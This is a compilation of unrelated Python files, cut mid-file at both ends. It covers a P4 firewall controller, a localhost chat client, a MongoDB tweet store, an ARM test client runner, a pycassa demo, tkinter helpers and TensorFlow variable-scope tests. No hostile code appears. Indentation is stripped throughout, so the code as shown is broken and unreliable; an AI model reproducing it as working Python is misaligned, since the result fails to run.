print "Already allow traffic from switch %s to %s" % (
s3.device_id, s2.device_id)
if s3.device_id not in accept_rules[s3.device_id]:
r = writeTableEntry(p4info_helper, s3, TABLE_NAME,
"00:00:00:00:03:03", 1, "10.0.3.3")
accept_rules[s3.device_id][s3.device_id] = r
else:
print "Already allow traffic from switch %s to %s" % (
s3.device_id, s3.device_id)
print "Installed transit rules for s3"
# read table rules
readTableRules(p4info_helper, s1)
readTableRules(p4info_helper, s2)
readTableRules(p4info_helper, s3)
except grpc.RpcError as e:
printGrpcError(e)
except KeyboardInterrupt:
print " Shutting down."
ShutdownAllSwitchConnections()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='P4Runtime Controller')
parser.add_argument('--p4info', help='p4info proto in text format from p4c',
type=str, action="store", required=False,
default='./build/firewall.p4.p4info.txt')
parser.add_argument('--bmv2-json', help='BMv2 JSON file from p4c',
type=str, action="store", required=False,
default='./build/firewall.json')
args = parser.parse_args()
if not os.path.exists(args.p4info):
parser.print_help()
print "\np4info file not found: %s\nHave you run 'make'?" % args.p4info
parser.exit(1)
if not os.path.exists(args.bmv2_json):
parser.print_help()
print "\nBMv2 JSON file not found: %s\nHave you run 'make'?" % args.bmv2_json
parser.exit(1)
main(args.p4info, args.bmv2_json)
|
clientV4.py
|
import socket
import threading
helpMessage = '-q -- close connection\n-l -- list of connected devices\n-t -- server time\n-s "arduino/client" "receiver name" "message" -- send a message (messages can be at most 100 characters)\nif the receiver is an arduino board it can be controlled by this message:\n -s arduino "arduino name" led "0/1/status"\n'
print("connecting...\n for command list write '-h' \n"+helpMessage)
host = '127.0.0.1' # 127.0.0.1 for local
port = 9999 # 9999 for local
socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.connect((host, port))
def recvTh():
while True:
try:
message = socket.recv(100).decode('ascii')
if message == 't':
socket.send("c".encode('ascii'))
elif message == 'n':
name = input("Enter your client name: ")
socket.send(name.encode('ascii'))
else:
print(message+"\n")
except ConnectionAbortedError:
break
except:
print("connection error")
socket.close()
break
def sendTh():
while True:
message = input()
if (len(message)<= 1024):
tokens = message.split()
if tokens[0] == '-h':
print(helpMessage)
elif tokens[0] == '-q':
print("quiting")
socket.send('-q'.encode('ascii'))
socket.close()
break
else:
socket.send(message.encode('ascii'))
else:
print("message must be under 1024 char")
recvThread = threading.Thread(target=recvTh)
sendThread = threading.Thread(target=sendTh)
recvThread.start()
sendThread.start()
|
sara_data.py
|
"""SaraData"""
import queue
import threading
from sara.core.config import DATABASE as default_database
from sara.core.config import sara_files_path
from sara.core.mongo.db import get_client, load_database, load_tweets
from sara.core.sara_file.db import load_data, save_data_file
from sara.core.utils import create_path
tweets_queue = queue.Queue()
def storage_mongodb():
"""Queue to save data in MongoDB."""
while True:
tweet, connection = tweets_queue.get()
connection.replace_one(tweet, tweet, True)
tweets_queue.task_done()
# Use thread to save data in database.
threading.Thread(target=storage_mongodb, daemon=True).start()
class SaraData:
"""
    Encapsulate the backend used to store and load the data.
"""
def __init__(self, collection_name=None, database=None,
storage_type='mongodb'):
"""SaraData arguments, collection_name and storage_type."""
if database:
self.database = database
else:
# default database
self.database = default_database
self.collection = collection_name
# backend to store the data.
self.storage_type = storage_type
if 'mongodb' in self.storage_type:
print('using mongodb')
self.client = get_client()
elif 'sarafile' in storage_type:
print('using SaraFile')
self.sara_file_storage = f'{sara_files_path}/{self.collection}'
create_path(self.sara_file_storage)
def update_database(self, database):
"""Update database used."""
self.database = database
print(f'Database updated to {self.database}')
def get_tweets(self, number_tweets=None):
"""Get tweets.
        If number_tweets is not defined, return the whole collection.
        Return a list of tweets in JSON.
"""
if 'mongodb' in self.storage_type:
print("Use get_projected_data to load a big number of data.")
return load_tweets(self.database, self.collection, number_tweets)
if 'sqlite' in self.storage_type:
pass
if 'sarafile' in self.storage_type:
return load_data(self.collection)
return None
def get_projected_data(self, project, number_tweets):
"""Get filtered data"""
conn = load_database(self.client, self.database, self.collection)
return conn.find(projection=project).limit(number_tweets)
def get_filtered_tweet(self, proj_filter, project, number):
"""Get filtered data."""
conn = load_database(self.client, self.database, self.collection)
return conn.find(filter=proj_filter, projection=project).limit(number)
def count_recovered_documments(self, proj_filter, number):
"""Return number the elements returned by the query the Mongo."""
conn = load_database(self.client, self.database, self.collection)
recovered = conn.count_documents(proj_filter, limit=number)
return recovered
def save_data(self, data):
"""Save data."""
if 'mongodb' in self.storage_type:
conn = load_database(self.client, self.database, self.collection)
# to store in database
tweets_queue.put((data, conn))
if 'sarafile' in self.storage_type:
save_data_file(f'{self.sara_file_storage}/{self.collection}', data)
def get_all_collections(self):
"""Return all collections from a database."""
collections_list = []
if 'mongodb' in self.storage_type:
database = self.client[self.database].collection_names()
for collection_name in database:
collections_list.append(collection_name)
return collections_list
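# Usage sketch (collection and payload are hypothetical):
#   sara = SaraData(collection_name='tweets', storage_type='mongodb')
#   sara.save_data({'id': 1, 'text': 'hello'})  # queued to the writer thread
#   docs = sara.get_projected_data({'text': 1}, number_tweets=100)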
|
client_runner.py
|
"""
Copyright 2019-2020 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from copy import deepcopy
import logging
import queue
import threading
from time import time
import pelion_test_lib.tools.utils as utils
flog = logging.getLogger('ClientRunner')
flog.setLevel(logging.DEBUG)
fh = logging.FileHandler('client.log')
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s:%(name)s:%(threadName)s:%(levelname)s: %(message)s')
fh.setFormatter(formatter)
flog.addHandler(fh)
log = logging.getLogger(__name__)
class Client:
"""
Client runner class that handles communication for given dut object
:param dut: Running client object
:param trace: Log the raw client output
:param name: Logging name for the client
"""
def __init__(self, dut, trace=False, name='0'):
self._ep_id = None
self.name = name
self.trace = trace
self.run = True
self.iq = queue.Queue()
self.dut = dut
input_thread_name = '<-- D{}'.format(name)
it = threading.Thread(target=self._input_thread, name=input_thread_name)
it.setDaemon(True)
log.info('Starting runner threads for client "D{}"'.format(self.name))
it.start()
def _input_thread(self):
"""
Runner's input thread
"""
while self.run:
line = self.dut.readline()
if line:
plain_line = utils.strip_escape(line)
if b'\r' in line and line.count(b'\r') > 1:
plain_line = plain_line.split(b'\r')[-2]
plain_line = plain_line.replace(b'\t', b' ').decode('utf-8', 'replace')
flog.info('<--|D{}| {}'.format(self.name, plain_line.strip()))
if self.trace:
log.debug('Raw output: {}'.format(line))
if b'Error' in line:
log.error('Output: {}'.format(line))
self.iq.put(plain_line)
else:
pass
def _read_line(self, timeout):
"""
Read data from input queue
:param timeout: Timeout
:return: Data from queue
"""
return self.iq.get(timeout=timeout)
def clear_input(self):
"""
Clear input queue messages
"""
with self.iq.mutex:
self.iq.queue.clear()
def kill(self):
"""
Kill the client runner
"""
log.debug('Killing client "D{}" runner...'.format(self.name))
self.run = False
def reset(self):
"""
Send reset to client
"""
self.dut.reset()
def endpoint_id(self, wait_for_response=10):
"""
Get endpoint id from client
:param wait_for_response: Timeout waiting the response
:return: Endpoint id
"""
if self._ep_id is None:
ep_id = self.wait_for_output('Device Id:', wait_for_response)
if ep_id is not None:
ep_array = ep_id.split()
                if len(ep_array) > 2:
self._ep_id = ep_array[2]
return self._ep_id
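    # The client is expected to print a line such as "Device Id: 0161..."
    # (format assumed from the parsing above), so ep_array[2] is the
    # identifier token following 'Device' and 'Id:'.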
def wait_for_output(self, search, timeout=60, assert_errors=True, ignore_case=True, errors=None):
"""
Wait for expected output response
:param search: Expected response string
:param timeout: Response waiting time
:param assert_errors: Assert on error situations
:param ignore_case: Ignore client output's casing
:param errors: String(s) that should cause error
:return: Response line with expected string or None if either line containing
one of the errors strings was found or timeout was reached (and assert_errors was False)
"""
if errors is None:
errors = []
elif isinstance(errors, str):
errors = [errors]
if ignore_case:
search = search.lower()
errors = deepcopy(errors)
for i, error in enumerate(errors):
errors[i] = error.lower()
return self._do_wait_for_output(search, errors, timeout, assert_errors, ignore_case)
def _do_wait_for_output(self, search, errors, timeout, assert_errors, ignore_case):
start = time()
now = 0
time_to_wait = timeout
timeout_error_msg = 'Didn\'t find {} in {} s'.format(search, time_to_wait)
while True:
try:
line = self._read_line(1)
if line:
if ignore_case:
line = line.lower()
if search in line:
end = time()
log.debug('Expected string "{}" found! [time][{:.4f} s]'.format(search, end - start))
return line
for error in errors:
if error in line:
end = time()
log.debug('Expected error string "{}" found! [time][{:.4f} s]'.format(error, end - start))
break
else:
continue
if assert_errors:
assert False, 'Error string found from line "{}"'.format(line)
else:
return None
else:
last = now
now = time()
if now - start >= timeout:
if assert_errors:
assert False, timeout_error_msg
else:
log.warning(timeout_error_msg)
break
if now - last > 1:
log.debug('Waiting for "{}" string... Timeout in {:.0f} s'.format(search,
abs(now - start - timeout)))
except queue.Empty:
last = now
now = time()
if now - start >= timeout:
if assert_errors:
assert False, timeout_error_msg
else:
log.warning(timeout_error_msg)
break
if now - last > 1:
log.debug('Waiting for "{}" string... Timeout in {:.0f} s'.format(search,
abs(now - start - timeout)))
|
ch3_2.3.1_time_series1.py
|
#! /usr/bin/env python
'''
Demonstrates how a simple group can be used as a one-to-many
relationship using a column family
'''
import util
from pycassa.columnfamily import ColumnFamily
from pycassa.types import *
import time
from threading import Thread
import json
import datetime
import random
# Load event data from data/events.csv
def loadData():
events = util.readCSV('data/events.csv')
eventsList = []
for event in events:
e = {
'user': event[0],
'page': event[1],
'event': event[2],
'element': event[3]
}
eventsList.append(e)
for i in range(2):
t = Thread(target=randomEvent, args=(i, eventsList))
t.start()
def randomEvent(i, events):
event = random.choice(events)
con = util.getConnection()
eventsCF = ColumnFamily(con, 'event_log')
for j in range(50):
event = random.choice(events)
rowkey = event['user']
timestamp = datetime.datetime.utcnow()
colval = json.dumps(event)
print '[Thread:{3}] Inserting: [{0}=> {{{1}:{2}}}]'.format(rowkey, timestamp, colval, i)
eventsCF.insert(rowkey, {timestamp: colval})
time.sleep(0.1) #100 milliseconds
    print 'finished insertion.'
con.dispose()
def getByTag(tag):
    print '''-- MOVIES GROUPED BY USER FOR A GIVEN TAG --'''
print '''tag: {}'''.format(tag)
con = util.getConnection()
tagCF = ColumnFamily(con, 'tag_videos_composite')
movies = tagCF.get(tag.strip().lower())
for key, val in movies.iteritems():
compositeCol = key
print '([{0}],[{1}]) => {2}'.format(compositeCol[0], compositeCol[1], val)
movieSlice = tagCF.get(tag.strip().lower(), column_start=("Kara", "The Croods:Kara"), column_finish=("Sally","Gx" ))
#movieSlice = tagCF.get(tag.strip().lower(), column_start=("Kara", ), column_finish=(("Leo Scott",False),))
print '-- SLICES --'
for key, val in movieSlice.iteritems():
compositeCol = key
print '([{0}],[{1}]) => {2}'.format(compositeCol[0], compositeCol[1], val)
con.dispose()
if __name__ == '__main__':
loadData()
#getByTag('action')
|
__init__.py
|
"""Gui related classes"""
import threading
from queue import Queue, Empty
from tkinter import *
from tkinter.ttk import *
from tkinter.filedialog import askopenfilename
from tkinter.simpledialog import Dialog
class UiRoot(Tk):
def __init__(self):
Tk.__init__(self)
self._queue = Queue()
self._processQueue()
def run(self, func):
"""Post functions to run them on the main thread"""
self._queue.put(func)
def _processQueue(self):
while True:
try:
self._queue.get(block=False)()
except Empty:
break
self.after(100, self._processQueue)
class UiFrame(Frame):
def run(self, func):
self.master.run(func)
class UiDialog(Dialog):
def run(self, func):
self.master.run(func)
def buttonbox(self):
pass
class BackgroundTask(object):
"""Similar to Android's AsyncTask"""
def __init__(self, ui):
self.ui = ui
def doBefore(self):
"""Runs on the main thread, returns arg"""
pass
def do(self, arg):
"""Runs on a separate thread, returns result"""
pass
def doAfter(self, result):
"""Runs on the main thread again"""
pass
def run(self):
"""Invoke this on the main thread only"""
arg = self.doBefore()
threading.Thread(target=self._onThread, args=[arg]).start()
def _onThread(self, arg):
result = self.do(arg)
self.ui.run(lambda: self.doAfter(result))
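    # Subclass sketch (names are illustrative): override the three hooks and
    # call run() from the Tk main thread, e.g.
    #   class LoadFile(BackgroundTask):
    #       def doBefore(self): return askopenfilename()
    #       def do(self, path): return open(path).read()
    #       def doAfter(self, result): print(len(result))
    #   LoadFile(ui_root).run()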
class ScrollingText(Frame):
"""A wrapper for a Text widget with a scrollbar"""
def __init__(self, parent):
Frame.__init__(self, parent)
Grid.columnconfigure(self, 0, weight=1)
Grid.rowconfigure(self, 0, weight=1)
self.scrollbar = Scrollbar(self)
self.scrollbar.grid(row=0, column=1, sticky=N+S)
self.text = Text(self, yscrollcommand=self.scrollbar.set)
self.text.grid(row=0, column=0, sticky=N+S+W+E)
self.scrollbar.config(command=self.text.yview)
|
variable_scope_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for variable store."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gc
import threading
import numpy
from tensorflow.python.eager import context
from tensorflow.python.eager import function
from tensorflow.python.eager import wrap_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.layers import core as core_layers
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables as variables_lib
from tensorflow.python.platform import test
from tensorflow.python.util import compat
from tensorflow.python.util import tf_inspect
def run_inside_wrap_function_in_eager_mode(graph_function):
"""Decorator to execute the same graph code in eager and graph modes.
In graph mode, we just execute the graph_function passed as argument. In eager
mode, we wrap the function using wrap_function and then execute the wrapped
result.
Args:
graph_function: python function containing graph code to be wrapped
Returns:
decorated function
"""
def wrap_and_execute(self):
if context.executing_eagerly():
wrapped = wrap_function.wrap_function(graph_function, [self])
# use the wrapped graph function
wrapped()
else:
# use the original function
graph_function(self)
return wrap_and_execute
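# The tests below stack this decorator under @test_util.run_in_graph_and_eager_modes,
# so each body runs directly in graph mode and, in the eager pass, through
# wrap_function instead of plain eager execution.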
class VariableScopeTest(test.TestCase):
def tearDown(self):
gc.collect()
# This will only contain uncollectable garbage, i.e. reference cycles
# involving objects with __del__ defined.
self.assertEqual(0, len(gc.garbage))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVar(self):
vs = variable_scope._get_default_variable_store()
v = vs.get_variable("v", [1])
v1 = vs.get_variable("v", [1])
self.assertEqual(v, v1)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testResource(self):
vs = variable_scope._get_default_variable_store()
v1 = vs.get_variable("v", [1], use_resource=True)
self.assertTrue(isinstance(v1, resource_variable_ops.ResourceVariable))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNameExists(self):
vs = variable_scope._get_default_variable_store()
# No check by default, so we can both create and get existing names.
v = vs.get_variable("v", [1])
v1 = vs.get_variable("v", [1])
self.assertEqual(v, v1)
# When reuse is False, we fail when variables are already there.
vs.get_variable("w", [1], reuse=False) # That's ok.
with self.assertRaises(ValueError):
vs.get_variable("v", [1], reuse=False) # That fails.
# When reuse is True, we fail when variables are new.
vs.get_variable("v", [1], reuse=True) # That's ok.
with self.assertRaises(ValueError):
vs.get_variable("u", [1], reuse=True) # That fails.
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNamelessStore(self):
vs = variable_scope._get_default_variable_store()
vs.get_variable("v1", [2])
vs.get_variable("v2", [2])
expected_names = ["%s:0" % name for name in ["v1", "v2"]]
self.assertEqual(
set(expected_names), set([v.name for v in vs._vars.values()]))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Operation name: "tower0/foo/v/Assign" ... is not an element of
# this graph.
@test_util.run_in_graph_and_eager_modes
def testVarScopeInitializer(self):
init = init_ops.constant_initializer(0.3)
with variable_scope.variable_scope("tower0") as tower:
with variable_scope.variable_scope("foo", initializer=init):
v = variable_scope.get_variable("v", [])
self.evaluate(variables_lib.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.3)
with variable_scope.variable_scope(tower, initializer=init):
w = variable_scope.get_variable("w", [])
self.evaluate(variables_lib.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), 0.3)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeConstraint(self):
constraint = lambda x: 0. * x
with variable_scope.variable_scope("tower1") as tower:
with variable_scope.variable_scope("foo", constraint=constraint):
v = variable_scope.get_variable("v", [])
self.assertEqual(v.constraint, constraint)
with variable_scope.variable_scope(tower, constraint=constraint):
w = variable_scope.get_variable("w", [])
self.assertEqual(w.constraint, constraint)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Fetch argument <tf.Variable 'string:0' shape=() dtype=string>
# has invalid type <class '...ResourceVariable'>, must be a string or Tensor.
# (Can not convert a ResourceVariable into a Tensor or Operation.)
def testStringDefaultInitializer(self):
with self.cached_session():
v = variable_scope.get_variable("string", shape=[], dtype=dtypes.string)
variables_lib.global_variables_initializer().run()
self.assertAllEqual(compat.as_bytes(self.evaluate(v)), b"")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeDType(self):
with variable_scope.variable_scope("tower2") as tower:
with variable_scope.variable_scope("foo", dtype=dtypes.float16):
v = variable_scope.get_variable("v", [])
self.assertEqual(v.dtype.base_dtype, dtypes.float16)
with variable_scope.variable_scope(tower, dtype=dtypes.float16):
w = variable_scope.get_variable("w", [])
self.assertEqual(w.dtype.base_dtype, dtypes.float16)
def testGetVariableInGraphNestedUnderEagerContext(self):
with context.eager_mode():
@function.defun
def f():
v = variable_scope.get_variable("should_be_resource", [])
self.assertEqual(type(v), resource_variable_ops.ResourceVariable)
f()
def testEagerVariableStore(self):
with context.eager_mode():
store = variable_scope.EagerVariableStore()
with store.as_default():
v = variable_scope.get_variable("v", shape=(), trainable=True)
w = variable_scope.get_variable("w", shape=(), trainable=False)
self.assertTrue(v in store.variables())
self.assertTrue(w in store.variables())
self.assertTrue(v in store.trainable_variables())
self.assertFalse(w in store.trainable_variables())
self.assertFalse(v in store.non_trainable_variables())
self.assertTrue(w in store.non_trainable_variables())
# Test copying.
new_store = store.copy()
with new_store.as_default():
new_v = variable_scope.get_variable("v")
new_w = variable_scope.get_variable("w")
self.assertEqual(new_v.numpy(), v.numpy())
self.assertEqual(new_w.numpy(), w.numpy())
self.assertTrue(new_v in new_store.variables())
self.assertTrue(new_w in new_store.variables())
self.assertTrue(new_v in new_store.trainable_variables())
self.assertFalse(new_w in new_store.trainable_variables())
self.assertFalse(new_v in new_store.non_trainable_variables())
self.assertTrue(new_w in new_store.non_trainable_variables())
# Check that variables are separate instances.
for v in store.variables():
v.assign(-1)
for v in new_store.variables():
v.assign(1)
for v in store.variables():
self.assertEqual(v.numpy(), -1)
for v in new_store.variables():
self.assertEqual(v.numpy(), 1)
def testEagerVariableStoreWithEagerDefun(self):
with context.eager_mode():
@function.defun
def f():
x = constant_op.constant([[2.0]])
d1 = core_layers.Dense(
1, name="my_dense", kernel_initializer=init_ops.ones_initializer())
_ = d1(x) # create variables
self.assertEqual(len(d1.variables), 2)
v1, v2 = d1.variables
d2 = core_layers.Dense(
1,
name="my_dense",
kernel_initializer=init_ops.ones_initializer(),
_reuse=True)
_ = d2(x)
self.assertEqual(len(d2.variables), 2)
v3, v4 = d2.variables
self.assertAllEqual([v1, v2], [v3, v4])
f()
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
@test_util.run_in_graph_and_eager_modes
def testEagerVariablesStoreAddsToCollections(self):
store = variable_scope.EagerVariableStore()
with store.as_default():
trainable = variable_scope.get_variable("v1", [], trainable=True)
not_trainable = variable_scope.get_variable("v2", [], trainable=False)
concat = variable_scope.get_variable(
"v3", [], collections=[ops.GraphKeys.CONCATENATED_VARIABLES])
self.assertEqual(
ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES),
[trainable, not_trainable])
self.assertEqual(
ops.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES),
[trainable, concat])
self.assertEqual(
ops.get_collection(ops.GraphKeys.CONCATENATED_VARIABLES), [concat])
def testEagerVariablesOutsideStoreNotAddedToCollections(self):
with context.eager_mode():
variable_scope.get_variable("v1", [], trainable=True)
variable_scope.get_variable("v2", [], trainable=False)
self.assertFalse(ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES))
self.assertFalse(ops.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Operation name: "v4/Assign" ... is not an element of this graph.
@test_util.run_in_graph_and_eager_modes
def testInitFromNonTensorValue(self):
v = variable_scope.get_variable("v4", initializer=4, dtype=dtypes.int32)
self.evaluate(variables_lib.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 4)
w = variable_scope.get_variable(
"w4", initializer=numpy.array([1, 2, 3]), dtype=dtypes.int64)
self.evaluate(variables_lib.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), [1, 2, 3])
# A quirk to be revisited?
error = ValueError if context.executing_eagerly() else TypeError
with self.assertRaises(error):
variable_scope.get_variable("x4", initializer={})
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Operation name: "xx0/Assign" ...is not an element of this graph.
@test_util.run_in_graph_and_eager_modes
def testInitFromNonInitializer(self):
    # Test various dtypes with zeros initializer as follows:
types = [
dtypes.int8, dtypes.uint8, dtypes.int16, dtypes.uint16, dtypes.int32,
dtypes.int64, dtypes.bool
]
    # Use different variable names to distinguish the various dtypes.
for (i, dtype) in enumerate(types):
x = variable_scope.get_variable(
name="xx%d" % i, shape=(3, 4), dtype=dtype)
y = variable_scope.get_variable(
name="yy%d" % i,
shape=(3, 4),
dtype=dtype,
initializer=init_ops.zeros_initializer(dtype=dtype))
self.evaluate(variables_lib.global_variables_initializer())
self.assertAllEqual(self.evaluate(x.value()), self.evaluate(y.value()))
# TODO(alive): support variable partitioning/caching in eager mode.
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# InvalidArgumentError: /job:moo/replica:0/task:0/device:CPU:0 unknown device.
def testVarScopeCachingDevice(self):
with self.cached_session():
caching_device = "/job:moo"
with variable_scope.variable_scope("tower"):
with variable_scope.variable_scope(
"caching", caching_device=caching_device):
v = variable_scope.get_variable("v", [])
self.assertTrue(v.value().device.startswith(caching_device))
with variable_scope.variable_scope("child"):
v2 = variable_scope.get_variable("v", [])
self.assertTrue(v2.value().device.startswith(caching_device))
with variable_scope.variable_scope("not_cached", caching_device=""):
v2_not_cached = variable_scope.get_variable("v", [])
self.assertFalse(
v2_not_cached.value().device.startswith(caching_device))
with variable_scope.variable_scope(
"not_cached_identity_device",
caching_device=lambda op: op.device):
v2_identity_device = variable_scope.get_variable("v", [])
self.assertFalse(
v2_identity_device.value().device.startswith(caching_device))
with variable_scope.variable_scope("we_will_do_it_live") as vs_live:
vs_live.set_caching_device("/job:live")
v_live = variable_scope.get_variable("v", [])
self.assertTrue(v_live.value().device.startswith("/job:live"))
v_tower = variable_scope.get_variable("v", [])
self.assertFalse(v_tower.value().device.startswith(caching_device))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Operation name: ".../Assign"... is not an element of this graph.
@test_util.run_in_graph_and_eager_modes
def testVarScopeRegularizer(self):
init = init_ops.constant_initializer(0.3)
def regularizer1(v):
return math_ops.reduce_mean(v) + 0.1
def regularizer2(v):
return math_ops.reduce_mean(v) + 0.2
with variable_scope.variable_scope(
"tower3", regularizer=regularizer1) as tower:
with variable_scope.variable_scope("foo", initializer=init):
v = variable_scope.get_variable("v", [])
self.evaluate(variables_lib.variables_initializer([v]))
losses = ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)
self.assertEqual(1, len(losses))
self.assertAllClose(self.evaluate(losses[0]), 0.4)
with variable_scope.variable_scope(tower, initializer=init) as vs:
u = variable_scope.get_variable("u", [])
vs.set_regularizer(regularizer2)
w = variable_scope.get_variable("w", [])
        # The next 3 variables are not regularized, to test disabling regularization.
x = variable_scope.get_variable(
"x", [], regularizer=variable_scope.no_regularizer)
with variable_scope.variable_scope(
"baz", regularizer=variable_scope.no_regularizer):
y = variable_scope.get_variable("y", [])
vs.set_regularizer(variable_scope.no_regularizer)
z = variable_scope.get_variable("z", [])
# Check results.
losses = ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)
self.assertEqual(3, len(losses))
self.evaluate(variables_lib.variables_initializer([u, w, x, y, z]))
self.assertAllClose(self.evaluate(losses[0]), 0.4)
self.assertAllClose(self.evaluate(losses[1]), 0.4)
self.assertAllClose(self.evaluate(losses[2]), 0.5)
with variable_scope.variable_scope("foo", reuse=True):
# reuse=True is for now only supported when eager execution is disabled.
if not context.executing_eagerly():
v = variable_scope.get_variable("v",
[]) # "v" is already there, reused
losses = ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)
self.assertEqual(3, len(losses)) # No new loss added.
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Tensor-typed variable initializers must either be wrapped in an
# init_scope or callable...
@test_util.run_in_graph_and_eager_modes
def testInitializeFromValue(self):
init = constant_op.constant(0.1)
w = variable_scope.get_variable("v", initializer=init)
self.evaluate(variables_lib.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), 0.1)
with self.assertRaisesRegexp(ValueError, "shape"):
# We disallow explicit shape specification when initializer is constant.
variable_scope.get_variable("u", [1], initializer=init)
with variable_scope.variable_scope("foo", initializer=init):
# Constant initializer can be passed through scopes if needed.
v = variable_scope.get_variable("v")
self.evaluate(variables_lib.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.1)
# Check that non-float32 initializer creates a non-float32 variable.
init = constant_op.constant(1, dtype=dtypes.int32)
t = variable_scope.get_variable("t", initializer=init)
self.assertEqual(t.dtype.base_dtype, dtypes.int32)
# Raise error if `initializer` dtype and `dtype` are not identical.
with self.assertRaisesRegexp(ValueError, "don't match"):
variable_scope.get_variable("s", initializer=init, dtype=dtypes.float64)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Fetch argument <tf.Variable 'v0:0' shape=(1,) dtype=float32> has
# invalid type <class '...ops.resource_variable_ops.ResourceVariable'>, must
# be a string or Tensor. (Can not convert a ResourceVariable into a Tensor or
# Operation.)
def testControlDeps(self):
with self.cached_session() as sess:
v0 = variable_scope.get_variable(
"v0", [1], initializer=init_ops.constant_initializer(0))
with ops.control_dependencies([v0.value()]):
v1 = variable_scope.get_variable(
"v1", [1], initializer=init_ops.constant_initializer(1))
add = v1 + v0
# v0 should be uninitialized.
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
sess.run(v0)
# We should be able to initialize and run v1 without initializing
# v0, even if the variable was created with a control dep on v0.
sess.run(v1.initializer)
self.assertEqual(1, sess.run(v1))
# v0 should still be uninitialized.
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
sess.run(v0)
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
sess.run(add)
# If we initialize v0 we should be able to run 'add'.
sess.run(v0.initializer)
sess.run(add)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# AssertionError: True is not false (last assertFalse)
def testEnableResourceVariables(self):
old = variable_scope._DEFAULT_USE_RESOURCE
try:
variable_scope.enable_resource_variables()
self.assertTrue(isinstance(variables_lib.VariableV1(1.0),
resource_variable_ops.ResourceVariable))
variable_scope.disable_resource_variables()
self.assertFalse(isinstance(variables_lib.VariableV1(1.0),
resource_variable_ops.ResourceVariable))
finally:
variable_scope._DEFAULT_USE_RESOURCE = old
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Fetch argument None has invalid type <type 'NoneType'>
def testControlFlow(self):
with self.cached_session() as sess:
v0 = variable_scope.get_variable(
"v0", [], initializer=init_ops.constant_initializer(0))
var_dict = {}
# Call get_variable in each of the cond clauses.
def var_in_then_clause():
v1 = variable_scope.get_variable(
"v1", [1], initializer=init_ops.constant_initializer(1))
var_dict["v1"] = v1
return v1 + v0
def var_in_else_clause():
v2 = variable_scope.get_variable(
"v2", [1], initializer=init_ops.constant_initializer(2))
var_dict["v2"] = v2
return v2 + v0
add = control_flow_ops.cond(
math_ops.less(v0, 10), var_in_then_clause, var_in_else_clause)
v1 = var_dict["v1"]
v2 = var_dict["v2"]
# We should be able to initialize and run v1 and v2 without initializing
# v0, even if the variable was created with a control dep on v0.
sess.run(v1.initializer)
self.assertEqual([1], sess.run(v1))
sess.run(v2.initializer)
self.assertEqual([2], sess.run(v2))
# v0 should still be uninitialized.
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
sess.run(v0)
# We should not be able to run 'add' yet.
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
sess.run(add)
# If we initialize v0 we should be able to run 'add'.
sess.run(v0.initializer)
sess.run(add)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
